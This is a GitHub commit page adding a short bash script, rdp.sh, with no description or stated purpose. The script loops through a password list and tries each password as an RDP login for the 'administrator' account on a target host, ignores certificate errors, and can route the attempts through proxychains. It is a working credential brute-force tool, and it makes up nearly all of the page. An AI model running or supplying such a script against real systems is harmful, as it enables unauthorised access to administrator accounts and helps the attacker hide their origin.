Skip to content

Commit

Permalink
rdp.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
Brock committed Nov 23, 2014
1 parent d985e85 commit c9075f2
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions rdp.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
#!/bin/bash -v

cat data/password.txt | while read PWD
do
#echo proxychains xfreerdp /auth-only /cert-ignore /u:administrator /p:$PWD /v:$1
if [[ $2 == 'proxy' ]]; then
proxychains xfreerdp /cert-ignore /u:administrator /p:$PWD /v:$1
else
xfreerdp /cert-ignore /u:administrator /p:$PWD /v:$1
fi
done

0 comments on commit c9075f2

Please sign in to comment.